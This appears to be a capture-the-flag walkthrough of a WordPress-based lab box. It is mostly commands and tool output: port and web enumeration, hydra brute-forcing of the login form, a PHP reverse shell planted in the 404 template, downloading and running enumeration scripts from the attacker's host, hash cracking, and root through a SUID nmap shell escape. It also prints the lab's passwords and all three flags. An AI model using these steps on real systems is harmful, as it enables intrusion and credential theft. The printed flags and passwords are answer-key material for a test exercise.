Start port scanning and enumerating services.
# check if the box is up
ping <target-ip>
# run initial nmap scan
sudo nmap -sS -T4 <target-ip> -oN nmap/init
# run a service scan
sudo nmap -sV -p 22,80,443 -T4 <target-ip> -oN nmap/service
...
PORT STATE SERVICE REASON VERSION
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64 Apache httpd
443/tcp open ssl/http syn-ack ttl 64 Apache httpd
#run script scan
nmap -Pn -p 22,80,443 --script default,vuln <target-ip> -oN nmap/scripts
...
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /feed/: Wordpress version: 4.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
It appears to be an Apache webserver, possibly running Wordpress. Continue enumerating HTTP to confirm this.
# enumerate http
gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt -x txt,html,php -o gobuster.common
...
/robots.txt (Status: 200) [Size: 41]
/wp-login (Status: 200) [Size: 2657]
nikto -h http://<target-ip>/ -Format=txt -o nikto
...
+ GET Cookie wordpress_test_cookie created without the httponly flag
+ GET /wp-login/: Admin login page/section found.
+ GET /wordpress: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /wordpresswp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
+ GET /wordpresswp-login.php: Wordpress login found
wpscan --url http://<target-ip>/ -e vp
...
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Rss Generator (Aggressive Detection)
| - http://<target-ip>/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
| - http://<target-ip>/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
There is a few interesting entries in robots.txt.
# view robots.txt
curl http://<target-ip>/robots.txt
...
User-agent: *
fsocity.dic
key-1-of-3.txt
# grab both the files
wget http://<target-ip>/key-1-of-3.txt
wget http://<target-ip>/fsocity.dic
The text file is a flag and the fsocity.dic appears to be a wordlist. Enumerate the Wordpress user name with the found wordlist.
# sort and remove duplicates in wordlist
sort fsocity.dic | uniq > fsocity.dic.uniq
# enumerate wp-login user
hydra -L fsocity.dic.uniq -p blah <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
...
[80][http-post-form] host: <target-ip> login: Elliot password: blah
# bruteforce login
hydra -l Elliot -P fsocity.dic.uniq <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
...
[80][http-post-form] host: <target-ip> login: Elliot password: ER28-0652
key-1-of-3.txt:073403c8a58a1f80d943455fb30724b9
Elliot:ER28-0652
Log into Wordpress and modify the 404 template (404.php) and replace contents with php reverse shell.
# setup a listner on attacking machine and navigate to non existent URL in browser
netcat -lvnp 8001
# stabilise captured shell
python3 -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm
# background shell with Ctrl + Z
sudo stty raw -echo; fg
# search /home/robot to reveal the second flag location
ls -la /home/robot
...
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
Flag file needs a higher permission to view and password.raw-md5 appears to be a password hash. Upload linpeas and or LinEnum to target machine.
# on attacking machine serve LinEnum.sh
python3 -m http.server 8080
# on target download linpeas.sh and make executable
wget http://<attack-ip>:8080/LinEnum.sh
wget http://<attack-ip>:8080/linpeas.sh
chmod +x LinEnum.sh
chmod +x linpeas.sh
./LinEnum.sh
./linpeas.sh
...
[+] nmap is available for network discover & port scanning, you should use it yourself
...
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
Using the found hash, escalate privileges.
# on the attacking machine crack found hash with john
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt password.raw-md5
# log into robot
su robot
We can use nmap to spawn a root shell as per GTFOBins.
# escalate to root using nmap
nmap --interactive
nmap> !sh
robot:abcdefghijklmnopqrstuvwxyz
key-2-of-3.txt:822c73956184f694993bede3eb39f959
key-3-of-3.txt:04787ddef27c3dee1ee161b21670b4e4